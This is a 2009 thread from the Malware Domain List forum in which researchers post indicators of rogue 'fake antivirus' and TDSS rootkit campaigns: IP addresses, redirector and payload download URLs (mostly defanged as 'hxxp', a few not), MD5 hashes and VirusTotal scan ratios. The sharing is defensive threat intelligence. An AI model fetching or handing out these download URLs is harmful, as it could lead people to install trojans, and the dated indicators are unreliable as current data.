Malware Domain List

Malware Related => Malicious Domains => Topic started by: Malware-Web-Threats on April 11, 2009, 10:29:19 pm

Title: Rogue - Fake AV
Post by: Malware-Web-Threats on April 11, 2009, 10:29:19 pm
64.146.2.92

Code:
hxxp://scanplus4.info/download/install.php
hxxp://newscan4.info/download/install.php

VirusTotal: TDSS - InternetAntivirus (http://www.virustotal.com/analisis/2b7425b937e24f9d0009a5cba82ec59c) 5/40 (12.5%)

Second payload (Anubis (http://anubis.iseclab.org/?action=result&task_id=18ad679545f16b35485f114e868a93dd4))

Code:
hxxp://in4tk.com/download/file.exe
hxxp://in4tk.com/download/InternetAntivirusPro.exe

file.exe VirusTotal: Trojan Hiloti (http://www.virustotal.com/analisis/647005a9fa751e0b1b9d0b48d1a54d66) 7/38 (18.43%)

InternetAntivirusPro.exe VirusTotal: Fake AV (http://www.virustotal.com/analisis/174f703f5c3564354fc754a1ac0a8ac3) 2/39 (5.13%)

Redirector: gosidescan.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 11, 2009, 10:40:54 pm
209.44.126.14 - Fake Antivirus

Code:
hxxp://anytoplikedsite.com/download.php
hxxp://anytoplikedsite.com/installpv.exe
hxxp://topsecurity4you.com/download.php
hxxp://topsecurity4you.com/installpv.exe
hxxp://cleanyourpcspace.com/download.php
hxxp://cleanyourpcspace.com/installpv.exe
hxxp://fullsecurityshield.com/download.php
hxxp://fullsecurityshield.com/installpv.exe

VirusTotal (http://www.virustotal.com/analisis/df25331e818c6b213ffe315c87ea1890) 13/40 (32.50%)
VirusTotal (http://www.virustotal.com/analisis/5e62735e2c55f532e7383569e072af55) 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/05b212b5e1a2a50338795823e803628f) 5/40 (12.5%)
VirusTotal (http://www.virustotal.com/analisis/f74c35455505150ed5281c17750bbbc7) 6/40 (15%)
installpv.exe - VirusTotal (http://www.virustotal.com/analisis/dc35f4aae92e2a8b02437038fd6d8a9c) 6/40 (15%)

Title: Re: Rogue - Fake AV
Post by: MysteryFCM on April 11, 2009, 11:01:28 pm
Cheers :)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 12, 2009, 11:30:08 pm
66.197.154.199

Code:
hxxp://log6scan.info/download/install.php
hxxp://scan6log.info/download/install.php
hxxp://mainscan6.info/download/xp/install.php
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/6229a9646da127ab2d84585f2ff98d5a) 7/40 (17.5%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/8c028efd93b7058fad83d7dfecabed0b) 7/40 (17.5%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/1bc94e3cf26b5fcdafc7f0f50d9527ea) 4/40 (10%)

63.146.2.92

Code:
hxxp://newscan4.info/download/install.php
hxxp://scansafe4.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/a0d6944c6cde4786e3494f7e94acefaa) 7/40 (17.5%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/9a0230392dd6a716ed22064768040fa2) 7/40 (17.5%)

209.44.126.14

Code:
hxxp://trustsecurityshield.com/download.php
hxxp://trustsecurityshield.com/install/ws.zip
hxxp://trustsecurityshield.com/install/installpv.exe

VirusTotal: Trojan (http://www.virustotal.com/analisis/c36808fb4e5405239e3c69903da3d419) 7/40 (17.5%)
VirusTotal: Fake AV (http://www.virustotal.com/analisis/24ad9b32085ff2e997f88b79c697ccc8) 11/40 (27.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/37ba409a00f74d1dbfb930a6cba5f770) 3/40 (7.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 12, 2009, 11:39:48 pm
66.197.154.199

Code:
hxxp://gen6in.com/download/file.exe
hxxp://gen6in.com/download/InternetAntivirusPro.exe
hxxp://Gen6iz.com/download/file.exe
hxxp://Gen6iz.com/download/InternetAntivirusPro.exe

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/43efd3285739aebaecd94a0cae489682) 4/40 (10%)
VirusTotal: FakeAV (http://www.virustotal.com/analisis/d64c76e6dbe9e0dfcd76258bbb2f7f31) 2/40 (5%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/c7697967dea8e7a9cd161f3b30d9ea67) 4/40 (10%)
VirusTotal: FakeAV (http://www.virustotal.com/analisis/d64c76e6dbe9e0dfcd76258bbb2f7f31) 2/40 (5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 03:56:43 am
66.197.154.199

Code:
hxxp://main6scan.info/download/install.php
hxxp://scanlog6.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/b007bb8acaa4c8a53a140383b8a3ccb8) 6/40 (15%)

Same file

File size: 40960 bytes
MD5: b1467bfa3a5bd8a50d95ca543e296799
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 08:06:50 am
redirection

209.200.124.200

Code:
hxxp://bikervoice.com/index.php?option=com_content&view=category&id=1&Itemid=50

redirection

212.24.54.3
Code:
hxxp://traf.ws/?p=fattaft

91.212.65.10 (fake scan page)

Code:
hxxp://free-web-scaners.info/disk/?code=170
hxxp://free-web-scaners.info/scan/?

91.212.65.10 (fake av)

Code:
hxxp://trucount3000.com/cgi-bin/install.pl?adv=170
install.exe VirusTotal: Trojan (http://www.virustotal.com/analisis/5e4ad3f3a3acd0b674a2c2a4b02dce9e) 5/40 (12.5%)

file renamed to frmwrk32.exe after infection (Anubis Analysis (http://anubis.iseclab.org/?action=result&task_id=1f2938d6c2b8c17a4cd4c8682a418a4b9&format=html))

Redirection Analysis (http://wepawet.iseclab.org/view.php?hash=ec2106602e38a6c4d5208a74576bf78d&t=1239610232&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 11:19:04 am
91.212.41.96

Redirect to rogue - Wepawet Analysis (http://wepawet.iseclab.org/view.php?hash=b44bd6dd8d8f2d9aebaa6b271a495208&t=1239620369&type=js)

Code:
http://xh.kaktotak.net/in.cgi?9&tsk=id778-29mar09-r35
63.146.2.92

Code:
hxxp://scantool4.info/download/install.php
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/39cc361882f1ca3ce8728d0ea0f880a8) - 8/40 (20%)

66.197.154.199

Code:
hxxp://scan6step.com/download/install.php
hxxp://scanlite6.com/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/b132c3e3109c2f30be0774301a40da25) - 8/40 (20%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/a85b854615752b3c72162cdca18f53f3) - 8/40 (20%)

91.212.41.110

Another redirection: Wepawet Analysis (http://wepawet.iseclab.org/view.php?hash=6ef685a373c71e09d719408269632007&t=1239621000&type=js)

Code:
hxxp://ysh.soulmosp.cn/in.cgi?9&tsk=id775-27mar09-r35
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 02:43:40 pm
63.146.2.92

Redirectors to rogue

Code:
hxxp://gomindscan.com

66.197.154.199

Code:
hxxp://goluxscan.com

Redirection Analysis (http://wepawet.iseclab.org/view.php?hash=3b419b6481f138ecc0c495e7e7cd0a1f&t=1239633669&type=js)
Redirection Analysis (http://wepawet.iseclab.org/view.php?hash=34d3a2e92e2fc8eb96b7688d3de1f6f2&t=1239634051&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 03:19:16 pm
84.16.227.223

Code:
hxxp://theonlinesecurityscan.com/download.php
hxxp://theonlinesecurityscan.com/download/ws.zip
hxxp://theonlinesecurityscan.com/download/installpv.exe

VirusTotal: Trojan (http://www.virustotal.com/analisis/5a9c5f8a32534e68e35fb42644c059bf) 10/40 (25%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/e58dce968ffbf9f74abe93dd617cc79f) 13/40 (32.5%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/624ac92fd39089c5e783ef356a840c1e) 8/40 (20.00%)

Redirectors

Code:
hxxp://theonlinesecurityscan.com/hitin.php

195.88.81.93 - Fake Scanner Page

Code:
hxxp://msscanner-top-av.com/200109/scan/

78.26.179.137

Code:
hxxp://files.ms-loads-av.com/exe/setup_1_2_1.exe

VirusTotal: Fake AV (http://www.virustotal.com/analisis/dcde499dcb9d2360c27856061f020467) 5/40 (12.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 05:06:22 pm
209.44.26.14 - Rogue Fake Antivirus

Code:
hxxp://securityscan4you.com/download.php
hxxp://securityscan4you.com/install/installpv.exe
hxxp://securityscan4you.com/install/ws.zip

VirusTotal: Trojan (http://www.virustotal.com/analisis/e27c5ec2b75919898955d65b73ae5782) 12/37 (32.44%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/e068d423582e107728b7f2181d96618c) 9/36 (25%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/89e77f3332a27b98b66f881abf55d897) 15/37 (40.55%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 06:55:58 pm
66.197.154.199 - Redirectors

Code:
hxxp://gotipscan.com
hxxp://goscanlux.com

66.197.154.199 - Payload

Code:
hxxp://scan6lite.com/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/c315fd8eaa8549b8daba580ac93cf12d) 13/39 (33.34%)

66.206.17.28 - Payload

Code:
hxxp://scan6user.com/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/ced0f60d868305feb1f530e6a80d49ce) 27/40 (67.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 13, 2009, 09:42:09 pm
63.146.2.92 (Fake Antivirus)

Code:
hxxp://tool4scan.info/download/install.php
VirusTotal: Trojan TDSS / InternetAntivirusPro (http://www.virustotal.com/analisis/823401c2f51007764b713f0894342507) 8/40 (20.00%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 14, 2009, 06:36:00 pm
63.146.2.92 - Rogue Fake AV

Code:
hxxp://scan4mini.com/download/install.php
hxxp://scan4star.com/download/install.php

Same file

File Name: install.exe
MD5: d6d929af1d4e28b43122a820f87d85dc

1) Anubis (http://anubis.iseclab.org/?action=result&task_id=1f788572cf84921244d32781ab94beb4f)
2) Anubis (http://anubis.iseclab.org/?action=result&task_id=17a15ba42dace599445c104e6faac1e99)

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/8cdb1fe0d3500cf6581c3c34c80b7791) 10/39 (25.65%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 15, 2009, 01:41:58 pm
209.44.126.14

Redirector:

Code:
hxxp://firstscansecurity.com/hitin.php
hxxp://firstscansecurity.com/in.php
hxxp://firstscansecurity.com/page.php

Trojan:

Code:
hxxp://firstscansecurity.com/download.php
hxxp://firstscansecurity.com/install/installpv.exe
hxxp://firstscansecurity.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/4db44261d088d917fe55b53f0ffdb8a9) - 28/40 (70%)
VirusTotal (http://www.virustotal.com/analisis/474a72b41e85912ed15b1f66b18cb869) - 2/39 (5.13%)
VirusTotal (http://www.virustotal.com/analisis/cc7b6f910c8049b7066813b38a8ea2dc) - 4/40 (10%)

Redirector:

Code:
hxxp://myfirstsecurityscan.com/hitin.php
hxxp://myfirstsecurityscan.com/in.php
hxxp://myfirstsecurityscan.com/page.php

Trojan:

Code:
hxxp://myfirstsecurityscan.com/download.php
hxxp://myfirstsecurityscan.com/install/installpv.exe
hxxp://myfirstsecurityscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/d8ba9f461692ddc1014c9ff0da277310) - 17/40 (42.5%)
VirusTotal (http://www.virustotal.com/analisis/a549b933c0311b55860af247a359a6c0) - 2/10 (5%)
VirusTotal (http://www.virustotal.com/analisis/ced1d1be0318905018c3e6fea23d025d) - 13/40 (32.5%)

Redirector:

Code:
hxxp://mytopvirusscan.com/hitin.php
hxxp://mytopvirusscan.com/in.php
hxxp://mytopvirusscan.com/page.php

Trojan:

Code:
hxxp://mytopvirusscan.com/download.php
hxxp://mytopvirusscan.com/install/installpv.exe
hxxp://mytopvirusscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/ae5730b115601f2b952d96745c612295) - 19/40 (47.5%)
VirusTotal (http://www.virustotal.com/analisis/1a45287af735ce8efb61bc2d3b6f5f12) - 2/40 (5%)
VirusTotal (http://www.virustotal.com/analisis/9042dc1411738ca21ddb819a4f30b7eb) - 14/40 (35%)

84.16.227.223

Code:
hxxp://theonlinesecurityscan.com/download.php
hxxp://theonlinesecurityscan.com/install/installpv.exe
hxxp://theonlinesecurityscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/9a842d3d0c31dd4cfac260d54946947e) - 26/40 (65%)
VirusTotal (http://www.virustotal.com/analisis/a30a006b419e7254cf280204a5ef21da) - 2/40 (5%)
VirusTotal (http://www.virustotal.com/analisis/377d2134ec0d5eb3b56516a77cacf919) - 1/40 (2.5%)

194.165.4.41

Code:
hxxp://scanbest6.com/download/install.php

VirusTotal (http://www.virustotal.com/analisis/b01f7d1ff1f47b50dfaf33b74c2d3540) - 16/40 (40%)

63.146.2.92

Code:
hxxp://scanmix4.com/download/install.php

VirusTotal (http://www.virustotal.com/analisis/a0f1dca3e0e896ee1b72a95fd33c9eef) - 13/40 (32.50%)

66.197.154.199 - Redirect to rogue

Code:
hxxp://gofanscan.com

91.212.41.110 - Redirect to rogue

Code:
hxxp://goldrushclub.cn/in?cgi?6
hxxp://anti.greenhistory.cn/in.cgi?6

91.212.41.111 - Redirect to rogue

Code:
hxxp://a.goldrushclub.cn/in?cgi?6
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 15, 2009, 01:51:46 pm
All on the same IP - 66.197.154.199

Redirect to rogue websites

Code:
hxxp://gorayscan.com
hxxp://goscanlite.com
hxxp://goscanmini.com
hxxp://godatascan.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 15, 2009, 04:47:11 pm
66.206.17.28

Code:
hxxp://step6scan.com/download/install.php

install.exe

File Size: 41472 Bytes
MD5: 260dc5b80c0dcaf57722e25fe9bf78d1

VirusTotal: Trojan (http://www.virustotal.com/analisis/456fd036a5137dc3b26d1c2041f954c7) - 9/40 (22.5%)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=183da5cb836cfe604b51f7c5827f6f62e&format=html)

66.206.17.29

Second download

Code:
hxxp://in6sd.com/download/file.exe
hxxp://in6sd.com/download/InternetAntivirusPro.exe

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/2945d18a615889b7a7f6299f7c0b44e3) - 34/40 (85%)
VirusTotal: Fake Antivirus (http://www.virustotal.com/analisis/5260f5a9e70d9840355933ad60a9a843) - 8/39 (20.52%)

Code:
hxxp://in6iq.com/download/file.exe
hxxp://in6iq.com/download/InternetAntivirusPro.exe

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/f97379c7ddef5f997c65915113728eea) - 7/40 (17.5%)
VirusTotal: Trojan InternetAntivirusPro (http://www.virustotal.com/analisis/59a68cfb41452c7f2ce4efcc6d5083b4) - 7/40 (17.5%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 17, 2009, 02:19:57 am
Rootkit TDSS variants

66.197.154.199

Code:
hxxp://any6scan.com/download/xp/install.php
hxxp://anyscan6.info/download/install.php
hxxp://scan6data.com/download/xp/install.php
hxxp://scan6base.info/download/install.php

File size: 40960 bytes
MD5: 93037e2f0ed5dd6ffcbef36cc3783537

Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1290937cc0a3f73e485c74dd48f041189)

VirusTotal (http://www.virustotal.com/analisis/719eb17e9616e076788f53361270c6b6) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/c2f494417dc44f48b8ec3f0bdc878ba7) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/4544f9778ea9133dffaa8747476049c7) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/d59f0d3e09ba5ae103f42376ccec7a94) - 6/40 (15%)

66.206.17.28

Code:
hxxp://scantrue6.com/download/install.php

File size: 40960 bytes
MD5: a6ae9b2378b16cc260012401449b0cf6

Anubis report (http://anubis.iseclab.org/?action=result&task_id=11853dcfb88f34fc4d5cb98ce9c4440fd)

VirusTotal (http://www.virustotal.com/analisis/e627b276b354177e323b65bd7ada3d2e) - 6/40 (15%)

63.146.2.92

Code:
hxxp://scanmix4.com/download/install.php

File size: 40960 bytes
MD5: 218f1314b96d1b5a475bf228f53da63c

Anubis report (http://anubis.iseclab.org/?action=result&task_id=14293f27773ee8c0489e1cd9349bff174&call=first)

VirusTotal (http://www.virustotal.com/analisis/3baf77a42569f04d49ea98ff8cbdb188) - 14/38 (36.85%)

Redirectors:

66.197.154.199

Code:
hxxp://goscanfan.com
hxxp://gostarscan.com
hxxp://gominiscan.com
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 17, 2009, 02:43:03 am
209.44.126.14

Code:
hxxp://totalvirusdestroyer.com/download.php
hxxp://totalvirusdestroyer.com/install/installpv.exe
hxxp://totalvirusdestroyer.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/58d418cecb71eb0c4092dcb74407f6ca) - 18/38 (47.37%)
VirusTotal (http://www.virustotal.com/analisis/edb14b669e29b4ef17e03a20711753c8) - 10/38 (26.32%)
VirusTotal (http://www.virustotal.com/analisis/9394263ebcaf0d4ec9b6f5cda69227fc) - 18/38 (47.37%)

91.212.65.55

Code:
hxxp://globalsecurityscan.com/download.php
hxxp://globalsecurityscan.com/install/installpv.exe
hxxp://globalsecurityscan.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/51c490f1d434204240a07798378f7a22) - 11/40 (27.5%)
VirusTotal (http://www.virustotal.com/analisis/884001f46db7c19a7dff265d69671f9c) - 7/40 (17.5%)
VirusTotal (http://www.virustotal.com/analisis/293d26b1c8c142eccfa81e100fe7d9ba) - 11/40 (27.5%)
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 17, 2009, 06:09:52 pm
195.88.81.74

Code:
files.scanner-antispy-av-files.com/exe/setup_200002.exe
http://www.virustotal.com/analisis/7cc2a0083ed4c8c466656b9a70fb7b2f 9/39
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 18, 2009, 03:46:40 am
209.44.126.14

Redirectors:
Code:
hxxp://fastviruscleaner.com/hitin.php
hxxp://fastviruscleaner.com/in.php
hxxp://fastviruscleaner.com/page.php

Payloads:
Code:
hxxp://fastviruscleaner.com/download.php
hxxp://fastviruscleaner.com/install/installpv.exe
hxxp://fastviruscleaner.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/7c4d3ad2c77e7b330b970b352fcaa56d) - 9/40 (22.50%)
VirusTotal (http://www.virustotal.com/analisis/05720fdbb452644261d387d57b9ac93d) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/fd1a256533a5870d935caa77c7aadd59) - 11/40 (27.5%)

Redirectors:
Code:
hxxp://destroyvirusnow.com/hitin.php
hxxp://destroyvirusnow.com/in.php
hxxp://destroyvirusnow.com/page.php

Payloads:
Code:
hxxp://destroyvirusnow.com/download.php
hxxp://destroyvirusnow.com/install/installpv.exe
hxxp://destroyvirusnow.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/b5894f5697df35132d96cc7eab44d833) - 13/40 (32.5%)
VirusTotal (http://www.virustotal.com/analisis/62c2f4546700f5dcbfe68b17f4338946) - 12/40 (30%)
VirusTotal (http://www.virustotal.com/analisis/a5b9869a89f1f4ad57cae7d0b658463d) - 16/40 (40%)

Redirectors:
Code:
hxxp://totalvirusdestroyer.com/hitin.php
hxxp://totalvirusdestroyer.com/in.php
hxxp://totalvirusdestroyer.com/page.php

Payloads:
Code:
hxxp://totalvirusdestroyer.com/download.php
hxxp://totalvirusdestroyer.com/install/installpv.exe
hxxp://totalvirusdestroyer.com/install/ws.zip

VirusTotal (http://www.virustotal.com/analisis/60e0d43a162def97b6fe02e55fb95cb2) - 10/40 (25%)
VirusTotal (http://www.virustotal.com/analisis/640dbfe7e4b70beec9deb70d184fc059) - 6/40 (15%)
VirusTotal (http://www.virustotal.com/analisis/a06e33fcd13381e77c647eea571cce7e) - 21/40 (52.5%)

66.197.154.199

Code:
hxxp://scanany6.info/download/install.php

Anubis report (http://anubis.iseclab.org/?action=result&task_id=1165a1bcf2ab5686481319b3b8cdbc986)
VirusTotal (http://www.virustotal.com/analisis/7bf992c7d137c0a7ec25467e615e1a53) - 8/40 (20%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 18, 2009, 10:16:50 am
Trojan FakeSpyguard - TDSS

211.95.73.189

Redirectors:
Code:
hxxp://dlsg09.com/sysgd09/setup.php
hxxp://dlsg09.com/maldef09/setup.php
hxxp://dlsgd3.com/sysgd09/setup.php
hxxp://dlsgd3.com/maldef09/setup.php
hxxp://getsgd3.com/sysgd09/setup.php
hxxp://getsgd3.com/maldef09/setup.php
hxxp://getsysgd09.com/sysgd09/setup.php
hxxp://getsysgd09.com/maldef09/setup.php
hxxp://dlmaldef092.com/maldef09/install.php
hxxp://dlmaldef092.com/sysgd09/install.php
hxxp://gomaldef092.com/sysgd09/setup.php
hxxp://gosgd3.com/sysgd09/setup.php
hxxp://systemguard2009.com/download/
hxxp://malwaredefender2009.com/download/

211.95.73.189

Fake scanner page:
Code:
hxxp://scan.systemcleaner22.com

84.16.243.169 / 78.159.122.59 / 84.16.251.222

Payload:
Code:
hxxp://84.16.243.169/sysgd09/setup.php
hxxp://84.16.243.169/maldef09/setup.php
hxxp://78.159.122.59/sysgd09/setup.php
hxxp://78.159.122.59/maldef09/setup.php
hxxp://84.16.251.222/sysgd09/install.php
hxxp://84.16.251.222/maldef09/setup.php

SystemGuard2009.exe

File size: 2674176 bytes
MD5: f36cfbf9d5d5489776564044645b70ef

VirusTotal (http://www.virustotal.com/analisis/8e9a80555cfba290713d4500856552fe) 20/40 (50%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 18, 2009, 10:56:24 am
TDSS variants

66.206.17.28
Code:
hxxp://scandata6.com/download/xp/install.php
VirusTotal (http://www.virustotal.com/analisis/5fc3eb54866d3f6185691cd4eeed6234) - 7/40 (17.5%)

63.146.2.92
Code:
hxxp://scan4easy.info/download/xp/install.php
VirusTotal (http://www.virustotal.com/analisis/ed0d6be2ddba79938799e70e5cfcd45f) - 5/40 (12.5%)

Code:
hxxp://scan6atom.info/download/install.php
VirusTotal (http://www.virustotal.com/analisis/ad2c87ab20d78381e9d844908d6f666d) - 10/40 (25%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 19, 2009, 05:01:26 pm
66.206.17.28

Same file: Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c72815202ebddee4a5a1f7c26bed8ebb)

File size: 40960 bytes
MD5: 231dec812f74b0b268d9370b89a7c491

Code:
hxxp://base6scan.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/65f8c12e86da01ba426dd2916e2106ae) - 9/40 (22.5%)
Code:
hxxp://justscan6.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/652a58e66cae04eb0994f496943967b4) - 10/40 (25%)

Code:
hxxp://just6scan.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/839fbcaf8610fa23a9e1a82d54db837c) - 10/40 (25%)
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 19, 2009, 08:49:52 pm
38.103.173.98

Code:
dwnld.offer-provider.com/secure/ecd53ab0b17e571df611d1ba513f2153/49eb89c9/srm/srm_free_setup.exe
174.36.195.17

Code:
dwnld.promotion-offer.com/secure/ecd53ab0b17e571df611d1ba513f2153/49eb89c9/srm/srm_free_setup.exe
http://www.virustotal.com/analisis/1a2775049bd5ccd487cafaa37545b041 7/40
Title: Re: Rogue - Fake AV
Post by: SysAdMini on April 19, 2009, 09:31:42 pm
174.36.195.17

Code:
dwnld.toppromooffer.com/secure/3f46e898cbfe2f66fc3ca1d798f71ad8/49eb8fa5/vsm/vsm_free_setup.exe
http://www.virustotal.com/analisis/26be3f85286b0734f235f5fc95f80e26 30/39

Code:
dwnld.toppromooffer.com/secure/fc744120baa2682ca3a444edf14d187b/49eb889e/cln/cln_free_setup.exe
http://www.virustotal.com/analisis/041ffd652d6134c35eb65a6743b18196 2/40

Code:
dwnld.toppromooffer.com/secure/4c9abc6b3dd24601d386633223f70e35/49eb8e79/srm/srm_free_setup1603.exe
http://www.virustotal.com/analisis/8063e36751f873a510949769b1f839ef 13/40

Code:
dwnld.toppromooffer.com/secure/13e96273b72b50a4bb226d782f555124/49eb8e79/srm/srm_free_setup1602.exe
http://virscan.org/report/797db2b5fcd0354f6fe88c0d15f6ba87.html 7/38

Code:
dwnld.toppromooffer.com/secure/c5c929bd78d623f3c8e2a68a7d0fb5f1/49eb82c1/sec/sec_free_setup.exe
http://www.virustotal.com/analisis/39bb1fca3de4e29d1cd294f5af935afc 18/40
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 19, 2009, 10:04:34 pm
66.206.17.28

Same file

File name: install.exe
File size: 40960 bytes
MD5: 231dec812f74b0b268d9370b89a7c491

Code:
hxxp://scanjust6.info/download/install.php
hxxp://scan6just.info/download/install.php

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/979eb25325ad491f36084be0252e7bf1) - 10/40 (25%)
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/839fbcaf8610fa23a9e1a82d54db837c) - 10/40 (25%)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 20, 2009, 12:28:23 am
Redirects to rogue websites (change every 72 hours)

66.96.131.13

Code:
hxxp://texasvino.com

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=bd5e815ea24d230a6b6a547c39d56a3d&t=1240187169&type=js)

88.214.204.180

Code:
hxxp://info4us.info/in.php?v=28

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=7ad4c2e7b6a32cbd2a95c99fa86fb715&t=1240184561&type=js)

88.214.198.241

Code:
hxxp://onlyfind.net/in.cgi?3

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=83e6761e7ec3a37012d9786a29e1935b&t=1240178214&type=js)

91.212.41.110 / 91.212.41.111

Code:
hxxp://liteauction.cn/in.cgi?6
hxxp://newtransfer.cn/in.cgi?6
hxxp://workfuse.cn/in.cgi?6

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=5d61b052da01a3f1ae5fa54de77c448a&t=1240187024&type=js)
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=be3d8b9bcd4972859e074d0a6312660b&t=1240174926&type=js)
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=6f6dcbbd7ee6e50d0a646bf60d0c2199&t=1240186868&type=js)

87.248.163.58

Code:
hxxp://87.248.163.58/in.php?s=texasvino.com

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=af233eaa9acc39865ddc62287d3138d2&t=1240186884&type=js)

87.248.163.58

Code:
hxxp://098765.com/in.php
hxxp://999666999.com/in.php
hxxp://berrousmark2009.com/in.php
hxxp://dbytedelicious.com/in.php
hxxp://dbytedelicious.net/in.php
hxxp://dbytedelicious.org/in.php
hxxp://hola-aloha.net/in.php
hxxp://infidelirium.com/in.php
hxxp://infidelirium.info/in.php (not responding)
hxxp://infidelirium.net/in.php
hxxp://infidelirium.org/in.php
hxxp://lastpoher.ru/in.php
hxxp://massmarker2009.com/in.php
hxxp://murtinreid.com/in.php
hxxp://murtinreid.net/in.php
hxxp://sendsometraff.com/in.php
hxxp://x-more-x.net/in.php
hxxp://zerromark2009.com/in.php
hxxp://zorroless.com/in.php

Example:

Code:
hxxp://dbytedelicious.com/in.php

Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=104a4dda02430272b2f93348cb4fa43b&t=1240187557&type=js)
Title: Re: Rogue - Fake AV
Post by: Malware-Web-Threats on April 20, 2009, 07:45:31 am
Trojan TDSS variant on 66.206.17.28

Code:
hxxp://datascan4.info/download/install.php
hxxp://data4scan.info/download/install.php
hxxp://data6scan.info/download/install.php
hxxp://easyscan4.info/download/install.php
hxxp://easy4scan.info/download/xp/install.php
hxxp://ever4scan.info/download/install.php
hxxp://everscan4.info/download/install.php
hxxp://ever6scan.info/download/install.php
hxxp://everscan6.info/download/xp/install.php
hxxp://scaneasy4.info/download/install.php
hxxp://scaneasy6.info/download/xp/install.php

VirusTotal (http://www.virustotal.com/analisis/79ac0234d44a565d4ed1087d539b29b9) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/79ac0234d44a565d4ed1087d539b29b9) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/73aa4d4f4d67a54a5af493043e502c34) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/ed0d6be2ddba79938799e70e5cfcd45f) - 5/40 (12.50%)
VirusTotal (http://www.virustotal.com/analisis/ed0d6be2ddba79938799e70e5cfcd45f) - 5/40 (12.50%)
VirusTotal (http://www.virustotal.com/analisis/79ac0234d44a565d4ed1087d539b29b9) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/00e53e9f1ded46f9480b760cbdac2142) - 4/40 (10.00%)
VirusTotal (http://www.virustotal.com/analisis/73aa4d4f4d67a54a5af493043e502c34) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/73aa4d4f4d67a54a5af493043e502c34) - 7/40 (17.50%)
VirusTotal (http://www.virustotal.com/analisis/79ac0234d44a565d4ed1087d539b29b9) - 7/40 (17.50%)
